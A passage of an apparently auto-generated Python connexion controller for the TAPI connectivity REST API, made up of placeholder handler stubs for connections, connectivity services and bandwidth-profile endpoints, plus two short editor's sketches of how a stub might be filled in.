from tapi_server.models.tapi_connectivity_update_connectivity_service import TapiConnectivityUpdateConnectivityService # noqa: E501
from tapi_server.models.tapi_path_computation_path_ref import TapiPathComputationPathRef # noqa: E501
from tapi_server.models.tapi_topology_cost_characteristic import TapiTopologyCostCharacteristic # noqa: E501
from tapi_server.models.tapi_topology_latency_characteristic import TapiTopologyLatencyCharacteristic # noqa: E501
from tapi_server.models.tapi_topology_link_ref import TapiTopologyLinkRef # noqa: E501
from tapi_server.models.tapi_topology_node_edge_point_ref import TapiTopologyNodeEdgePointRef # noqa: E501
from tapi_server.models.tapi_topology_node_ref import TapiTopologyNodeRef # noqa: E501
from tapi_server.models.tapi_topology_resilience_type import TapiTopologyResilienceType # noqa: E501
from tapi_server.models.tapi_topology_risk_characteristic import TapiTopologyRiskCharacteristic # noqa: E501
from tapi_server.models.tapi_topology_topology_ref import TapiTopologyTopologyRef # noqa: E501
from tapi_server.models.tapi_connectivity_getconnectivityservicelist_output import TapiConnectivityGetconnectivityservicelistOutput # noqa: F401,E501
from tapi_server.models.tapi_connectivity_getconnectivityservicedetails_output import TapiConnectivityGetconnectivityservicedetailsOutput # noqa: F401,E501
from tapi_server.models.tapi_connectivity_getconnectiondetails_output import TapiConnectivityGetconnectiondetailsOutput # noqa: F401,E501
from tapi_server.models.tapi_connectivity_getconnectionendpointdetails_output import TapiConnectivityGetconnectionendpointdetailsOutput # noqa: F401,E501
from tapi_server import util
from tapi_server import database
def data_context_connectivity_context_connectionuuid_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get(uuid, topology_uuid, node_uuid, node_edge_point_uuid, connection_end_point_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get
returns tapi.connectivity.ConnectionEndPointRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param topology_uuid: Id of connection-end-point
:type topology_uuid: str
:param node_uuid: Id of connection-end-point
:type node_uuid: str
:param node_edge_point_uuid: Id of connection-end-point
:type node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:rtype: TapiConnectivityConnectionEndPointRef
"""
return 'do some magic!'
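# --- Editor's note (sketch; not generated code) ---
# connexion routes each REST operation to one of these module functions via
# the operationId in the OpenAPI specification; path template parameters such
# as {uuid} arrive as the keyword arguments in the signatures. A filled-in
# version of the stub above might look like the following, assuming a lookup
# helper on the imported `database` module (its real API is not shown here):
#
#     def data_context_connectivity_context_connectionuuid_get(uuid):
#         connection = database.get_connection(uuid)  # assumed helper
#         return connection if connection is not None else ('Not found', 404)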
def data_context_connectivity_context_connectionuuid_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_get
returns tapi.connectivity.Connection # noqa: E501
:param uuid: Id of connection
:type uuid: str
:rtype: TapiConnectivityConnection
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_lower_connectionconnection_uuid_get(uuid, connection_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_lower_connectionconnection_uuid_get
returns tapi.connectivity.ConnectionRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param connection_uuid: Id of lower-connection
:type connection_uuid: str
:rtype: TapiConnectivityConnectionRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_namevalue_name_get(uuid, value_name): # noqa: E501
"""data_context_connectivity_context_connectionuuid_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_routelocal_id_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get(uuid, local_id, topology_uuid, node_uuid, node_edge_point_uuid, connection_end_point_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_routelocal_id_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get
returns tapi.connectivity.ConnectionEndPointRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param local_id: Id of route
:type local_id: str
:param topology_uuid: Id of connection-end-point
:type topology_uuid: str
:param node_uuid: Id of connection-end-point
:type node_uuid: str
:param node_edge_point_uuid: Id of connection-end-point
:type node_edge_point_uuid: str
:param connection_end_point_uuid: Id of connection-end-point
:type connection_end_point_uuid: str
:rtype: TapiConnectivityConnectionEndPointRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_routelocal_id_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectionuuid_routelocal_id_get
returns tapi.connectivity.Route # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param local_id: Id of route
:type local_id: str
:rtype: TapiConnectivityRoute
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_routelocal_id_namevalue_name_get(uuid, local_id, value_name): # noqa: E501
"""data_context_connectivity_context_connectionuuid_routelocal_id_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param local_id: Id of route
:type local_id: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_supported_client_linktopology_uuidlink_uuid_get(uuid, topology_uuid, link_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_supported_client_linktopology_uuidlink_uuid_get
returns tapi.topology.LinkRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param topology_uuid: Id of supported-client-link
:type topology_uuid: str
:param link_uuid: Id of supported-client-link
:type link_uuid: str
:rtype: TapiTopologyLinkRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_get(uuid, switch_control_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_get
returns tapi.connectivity.SwitchControl # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:rtype: TapiConnectivitySwitchControl
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_namevalue_name_get(uuid, switch_control_uuid, value_name): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_resilience_type_get(uuid, switch_control_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_resilience_type_get
returns tapi.topology.ResilienceType # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:rtype: TapiTopologyResilienceType
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_sub_switch_controlconnection_uuidsub_switch_control_switch_control_uuid_get(uuid, switch_control_uuid, connection_uuid, sub_switch_control_switch_control_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_sub_switch_controlconnection_uuidsub_switch_control_switch_control_uuid_get
returns tapi.connectivity.SwitchControlRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:param connection_uuid: Id of sub-switch-control
:type connection_uuid: str
:param sub_switch_control_switch_control_uuid: Id of sub-switch-control
:type sub_switch_control_switch_control_uuid: str
:rtype: TapiConnectivitySwitchControlRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_get(uuid, switch_control_uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_get
returns tapi.connectivity.Switch # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:param local_id: Id of switch
:type local_id: str
:rtype: TapiConnectivitySwitch
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_namevalue_name_get(uuid, switch_control_uuid, local_id, value_name): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_namevalue_name_get
returns tapi.common.NameAndValue # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:param local_id: Id of switch
:type local_id: str
:param value_name: Id of name
:type value_name: str
:rtype: TapiCommonNameAndValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_selected_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get(uuid, switch_control_uuid, local_id, topology_uuid, node_uuid, node_edge_point_uuid, connection_end_point_uuid): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_selected_connection_end_pointtopology_uuidnode_uuidnode_edge_point_uuidconnection_end_point_uuid_get
returns tapi.connectivity.ConnectionEndPointRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:param local_id: Id of switch
:type local_id: str
:param topology_uuid: Id of selected-connection-end-point
:type topology_uuid: str
:param node_uuid: Id of selected-connection-end-point
:type node_uuid: str
:param node_edge_point_uuid: Id of selected-connection-end-point
:type node_edge_point_uuid: str
:param connection_end_point_uuid: Id of selected-connection-end-point
:type connection_end_point_uuid: str
:rtype: TapiConnectivityConnectionEndPointRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_selected_routeconnection_uuidroute_local_id_get(uuid, switch_control_uuid, local_id, connection_uuid, route_local_id): # noqa: E501
"""data_context_connectivity_context_connectionuuid_switch_controlswitch_control_uuid_switchlocal_id_selected_routeconnection_uuidroute_local_id_get
returns tapi.connectivity.RouteRef # noqa: E501
:param uuid: Id of connection
:type uuid: str
:param switch_control_uuid: Id of switch-control
:type switch_control_uuid: str
:param local_id: Id of switch
:type local_id: str
:param connection_uuid: Id of selected-route
:type connection_uuid: str
:param route_local_id: Id of selected-route
:type route_local_id: str
:rtype: TapiConnectivityRouteRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_service_post(tapi_connectivity_connectivitycontext_connectivity_service=None): # noqa: E501
"""data_context_connectivity_context_connectivity_service_post
creates tapi.connectivity.connectivitycontext.ConnectivityService # noqa: E501
:param tapi_connectivity_connectivitycontext_connectivity_service: tapi.connectivity.connectivitycontext.ConnectivityService to be added to list
:type tapi_connectivity_connectivitycontext_connectivity_service: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivitycontext_connectivity_service = TapiConnectivityConnectivitycontextConnectivityService.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
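# --- Editor's sketch (hypothetical; not part of the generated controller) ---
# How a generated POST stub is commonly completed: reject non-JSON bodies,
# deserialize into the generated model, store it, and return 201. The dict
# below stands in for a real storage layer, and the `uuid` attribute access
# assumes the TAPI model exposes one, as the schema suggests.
_connectivity_services_sketch = {}

def create_connectivity_service_sketch(tapi_connectivity_connectivitycontext_connectivity_service=None):
    if not connexion.request.is_json:
        return 'Request body must be JSON', 415
    service = TapiConnectivityConnectivitycontextConnectivityService.from_dict(connexion.request.get_json())  # noqa: E501
    _connectivity_services_sketch[service.uuid] = service
    return None, 201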
def data_context_connectivity_context_connectivity_serviceuuid_avoid_topologytopology_uuid_get(uuid, topology_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_avoid_topologytopology_uuid_get
returns tapi.topology.TopologyRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param topology_uuid: Id of avoid-topology
:type topology_uuid: str
:rtype: TapiTopologyTopologyRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_connectionconnection_uuid_get(uuid, connection_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_connectionconnection_uuid_get
returns tapi.connectivity.ConnectionRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param connection_uuid: Id of connection
:type connection_uuid: str
:rtype: TapiConnectivityConnectionRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_delete
removes tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_get(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_get
returns tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: TapiConnectivityConnectivityServiceRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_post(uuid, tapi_connectivity_connectivity_service_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_post
creates tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_connectivity_connectivity_service_ref: tapi.connectivity.ConnectivityServiceRef to be added to list
:type tapi_connectivity_connectivity_service_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_service_ref = TapiConnectivityConnectivityServiceRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_put(uuid, tapi_connectivity_connectivity_service_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_coroute_inclusion_put
creates or updates tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_connectivity_connectivity_service_ref: tapi.connectivity.ConnectivityServiceRef to be added or updated
:type tapi_connectivity_connectivity_service_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_service_ref = TapiConnectivityConnectivityServiceRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_cost_characteristic_post(uuid, tapi_topology_cost_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_cost_characteristic_post
creates tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_topology_cost_characteristic: tapi.topology.CostCharacteristic to be added to list
:type tapi_topology_cost_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_cost_characteristic = TapiTopologyCostCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_delete(uuid, cost_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_delete
removes tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_get(uuid, cost_name): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_get
returns tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:rtype: TapiTopologyCostCharacteristic
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_post(uuid, cost_name, tapi_topology_cost_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_post
creates tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:param tapi_topology_cost_characteristic: tapi.topology.CostCharacteristic to be added to list
:type tapi_topology_cost_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_cost_characteristic = TapiTopologyCostCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_put(uuid, cost_name, tapi_topology_cost_characteristic=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_cost_characteristiccost_name_put
creates or updates tapi.topology.CostCharacteristic # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param cost_name: Id of cost-characteristic
:type cost_name: str
:param tapi_topology_cost_characteristic: tapi.topology.CostCharacteristic to be added or updated
:type tapi_topology_cost_characteristic: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_topology_cost_characteristic = TapiTopologyCostCharacteristic.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_delete(uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_delete
removes tapi.connectivity.connectivitycontext.ConnectivityService # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusion_post(uuid, tapi_connectivity_connectivity_service_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusion_post
creates tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_connectivity_connectivity_service_ref: tapi.connectivity.ConnectivityServiceRef to be added to list
:type tapi_connectivity_connectivity_service_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_service_ref = TapiConnectivityConnectivityServiceRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_delete(uuid, connectivity_service_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_delete
removes tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param connectivity_service_uuid: Id of diversity-exclusion
:type connectivity_service_uuid: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_get(uuid, connectivity_service_uuid): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_get
returns tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param connectivity_service_uuid: Id of diversity-exclusion
:type connectivity_service_uuid: str
:rtype: TapiConnectivityConnectivityServiceRef
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_post(uuid, connectivity_service_uuid, tapi_connectivity_connectivity_service_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_post
creates tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param connectivity_service_uuid: Id of diversity-exclusion
:type connectivity_service_uuid: str
:param tapi_connectivity_connectivity_service_ref: tapi.connectivity.ConnectivityServiceRef to be added to list
:type tapi_connectivity_connectivity_service_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_service_ref = TapiConnectivityConnectivityServiceRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_put(uuid, connectivity_service_uuid, tapi_connectivity_connectivity_service_ref=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_diversity_exclusionconnectivity_service_uuid_put
creates or updates tapi.connectivity.ConnectivityServiceRef # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param connectivity_service_uuid: Id of diversity-exclusion
:type connectivity_service_uuid: str
:param tapi_connectivity_connectivity_service_ref: tapi.connectivity.ConnectivityServiceRef to be added or updated
:type tapi_connectivity_connectivity_service_ref: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivity_service_ref = TapiConnectivityConnectivityServiceRef.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_point_post(uuid, tapi_connectivity_connectivityservice_end_point=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_point_post
creates tapi.connectivity.connectivityservice.EndPoint # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param tapi_connectivity_connectivityservice_end_point: tapi.connectivity.connectivityservice.EndPoint to be added to list
:type tapi_connectivity_connectivityservice_end_point: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_connectivity_connectivityservice_end_point = TapiConnectivityConnectivityserviceEndPoint.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_burst_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_committed_information_rate_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_delete
removes tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_get
returns tapi.common.BandwidthProfile # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonBandwidthProfile
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: TapiCommonCapacityValue
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_post(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_post
creates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added to list
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_put(uuid, local_id, tapi_common_capacity_value=None): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_burst_size_put
creates or updates tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:param tapi_common_capacity_value: tapi.common.CapacityValue to be added or updated
:type tapi_common_capacity_value: dict | bytes
:rtype: None
"""
if connexion.request.is_json:
tapi_common_capacity_value = TapiCommonCapacityValue.from_dict(connexion.request.get_json()) # noqa: E501
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_delete(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_delete
removes tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
:param local_id: Id of end-point
:type local_id: str
:rtype: None
"""
return 'do some magic!'
def data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_get(uuid, local_id): # noqa: E501
"""data_context_connectivity_context_connectivity_serviceuuid_end_pointlocal_id_capacity_bandwidth_profile_peak_information_rate_get
returns tapi.common.CapacityValue # noqa: E501
:param uuid: Id of connectivity-service
:type uuid: str
